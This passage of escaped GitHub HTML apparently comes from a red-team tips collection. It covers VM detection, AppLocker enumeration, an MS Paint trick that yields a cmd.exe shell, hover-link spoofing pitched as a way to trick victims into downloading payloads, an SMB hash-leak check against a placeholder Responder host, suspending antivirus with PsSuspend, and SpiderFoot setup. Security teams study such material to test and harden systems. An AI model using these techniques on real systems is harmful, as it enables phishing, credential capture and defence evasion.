2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"reg query HKLM\\SYSTEM /s | findstr /S \u0026quot;VirtualBox VBOX VMWare\u0026quot;\"\u003e\u003cpre\u003ereg query HKLM\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eYSTEM /s \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e findstr /S \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eVirtualBox VBOX VMWare\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/dmcxblue\" rel=\"nofollow\"\u003e@dmcxblue\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/dmcxblue/status/1366779034672136194\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eEnumerate AppLocker rules\u003c/h3\u003e\u003ca id=\"user-content-enumerate-applocker-rules\" class=\"anchor\" aria-label=\"Permalink: 🔙Enumerate AppLocker rules\" href=\"#enumerate-applocker-rules\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"(Get-AppLockerPolicy -Local).RuleCollections\n\nGet-ChildItem -Path HKLM:Software\\Policies\\Microsoft\\Windows\\SrpV2 -Recurse\n\nreg query HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe\\\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e(Get-AppLockerPolicy -Local).RuleCollections\n\nGet-ChildItem -Path HKLM:Software\\Policies\\Microsoft\\Windows\\SrpV2 -Recurse\n\nreg query HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe\\\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'AppLocker can be a pain. Enumerate to see how painful'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/alh4zr3d/status/1614706476412698624\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eCMD shortcut with 6 pixels via mspaint\u003c/h3\u003e\u003ca id=\"user-content-cmd-shortcut-with-6-pixels-via-mspaint\" class=\"anchor\" aria-label=\"Permalink: 🔙CMD shortcut with 6 pixels via mspaint\" href=\"#cmd-shortcut-with-6-pixels-via-mspaint\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eOpen MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels\u003c/li\u003e\n\u003cli\u003eZoom in to make the following tasks easier\u003c/li\u003e\n\u003cli\u003eUsing the colour picker, set pixels values to (from left to right):\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e1st: R: 10, G: 0, B: 0\u003c/li\u003e\n\u003cli\u003e2nd: R: 13, G: 10, B: 13\u003c/li\u003e\n\u003cli\u003e3rd: R: 100, G: 109, B: 99\u003c/li\u003e\n\u003cli\u003e4th: R: 120, G: 101, B: 46\u003c/li\u003e\n\u003cli\u003e5th: R: 0, G: 0, B: 101\u003c/li\u003e\n\u003cli\u003e6th: R: 0, G: 0, B: 0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSave it as 24-bit Bitmap (\u003cem\u003e.bmp;\u003c/em\u003e.dib)\u003c/li\u003e\n\u003cli\u003eChange its extension from bmp to bat and run.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://www.pentestpartners.com/\" rel=\"nofollow\"\u003ePenTestPartners\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell\" rel=\"nofollow\"\u003eBlog\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eLink spoofing with PreventDefault JavaScript method\u003c/h3\u003e\u003ca id=\"user-content-link-spoofing-with-preventdefault-javascript-method\" class=\"anchor\" aria-label=\"Permalink: 🔙Link spoofing with PreventDefault JavaScript method\" href=\"#link-spoofing-with-preventdefault-javascript-method\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-text-html-basic notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"\u0026lt;!DOCTYPE html\u0026gt;\n\u0026lt;html\u0026gt;\n \u0026lt;head\u0026gt;\n \u0026lt;meta charset=\u0026quot;UTF-8\u0026quot;\u0026gt;\n \u0026lt;title\u0026gt;PreventDefault Example\u0026lt;/title\u0026gt;\n \u0026lt;/head\u0026gt;\n \u0026lt;body\u0026gt;\n \u0026lt;a href=\u0026quot;https://google.com\u0026quot; onclick=\u0026quot;event.preventDefault(); window.location.href = 'https://bing.com';\u0026quot;\u0026gt;Go to Google\u0026lt;/a\u0026gt;\n \u0026lt;/body\u0026gt;\n\u0026lt;/html\u0026gt;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003e\u0026lt;!DOCTYPE html\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehtml\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehead\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003emeta\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003echarset\u003c/span\u003e=\"\u003cspan class=\"pl-s\"\u003eUTF-8\u003c/span\u003e\"\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003etitle\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003ePreventDefault Example\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003etitle\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehead\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ebody\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ea\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ehref\u003c/span\u003e=\"\u003cspan class=\"pl-s\"\u003ehttps://google.com\u003c/span\u003e\" \u003cspan class=\"pl-c1\"\u003eonclick\u003c/span\u003e=\"\u003cspan class=\"pl-s\"\u003eevent.preventDefault(); window.location.href = 'https://bing.com';\u003c/span\u003e\"\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003eGo to Google\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ea\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ebody\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehtml\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003eThreat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link \u003ccode\u003egoogle.com\u003c/code\u003e, but once clicked the victim will be redirected to your malicious link \u003ccode\u003ebing.com\u003c/code\u003e. Great for getting victims to download payloads via a controlled site.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault\" rel=\"nofollow\"\u003ePreventDefault Docs\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eCheck SMB firewall rules with Responder\u003c/h3\u003e\u003ca id=\"user-content-check-smb-firewall-rules-with-responder\" class=\"anchor\" aria-label=\"Permalink: 🔙Check SMB firewall rules with Responder\" href=\"#check-smb-firewall-rules-with-responder\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-powershell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Copy-Item -Path \u0026quot;C:\\tmp\\\u0026quot; -Destination \u0026quot;\\\\\u0026lt;ip_running_responder\u0026gt;\\c$\u0026quot;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003eCopy-Item\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-\u003c/span\u003ePath \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\tmp\\\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-\u003c/span\u003eDestination \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\\\\\u0026lt;ip_running_responder\u0026gt;\\c$\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: \u003ccode\u003eCopy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u0026lt;ip_running_responder\u0026gt;\\c$\"\u003c/code\u003e. If Responder could capture the hash, the firewall allows outgoing SMB connections'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/malmoeb\" rel=\"nofollow\"\u003e@malmoeb\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/malmoeb/status/1628272928855826433\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eDisable AV with SysInternals PsSuspend\u003c/h3\u003e\u003ca id=\"user-content-disable-av-with-sysinternals-pssuspend\" class=\"anchor\" aria-label=\"Permalink: 🔙Disable AV with SysInternals PsSuspend\" href=\"#disable-av-with-sysinternals-pssuspend\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/238468403-4519f5ad-c177-4550-b9af-238fa73ad66e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NDAzLTQ1MTlmNWFkLWMxNzctNDU1MC1iOWFmLTIzOGZhNzNhZDY2ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03MTI5N2QxZGYwY2VhNjNlNzAwZTgzYjI1MzE2MzY5ODc3OWVjZjVlOTU4NmMxYWI1NjIzNzVmMTYxMGY3MWEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.hqYRc3EoxgaMMv4MaaqzB1S-PLT9acQhpp7EWXMYDuY\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/238468403-4519f5ad-c177-4550-b9af-238fa73ad66e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NDAzLTQ1MTlmNWFkLWMxNzctNDU1MC1iOWFmLTIzOGZhNzNhZDY2ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03MTI5N2QxZGYwY2VhNjNlNzAwZTgzYjI1MzE2MzY5ODc3OWVjZjVlOTU4NmMxYWI1NjIzNzVmMTYxMGY3MWEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.hqYRc3EoxgaMMv4MaaqzB1S-PLT9acQhpp7EWXMYDuY\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003eUsing the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eRelated Blog Post:\u003c/strong\u003e \u003ca href=\"https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7\" rel=\"nofollow\"\u003eBypassing AV via Process Suspension with PsSuspend.exe\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/0gtweet/status/1638069413717975046\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eReconnaissance\u003c/h1\u003e\u003ca id=\"user-content-reconnaissance\" class=\"anchor\" aria-label=\"Permalink: Reconnaissance\" href=\"#reconnaissance\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/smicallef/spiderfoot\"\u003espiderfoot\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-spiderfoot\" class=\"anchor\" aria-label=\"Permalink: 🔙spiderfoot\" href=\"#spiderfoot\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz\ntar zxvf v4.0.tar.gz\ncd spiderfoot-4.0\npip3 install -r requirements.txt\"\u003e\u003cpre\u003ewget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz\ntar zxvf v4.0.tar.gz\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e spiderfoot-4.0\npip3 install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://github.com/smicallef/spiderfoot?tab=readme-ov-file#installing--running\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 ./sf.py -l 127.0.0.1:5001\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e .\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003esf\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003epy\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003el\u003c/span\u003e \u003cspan 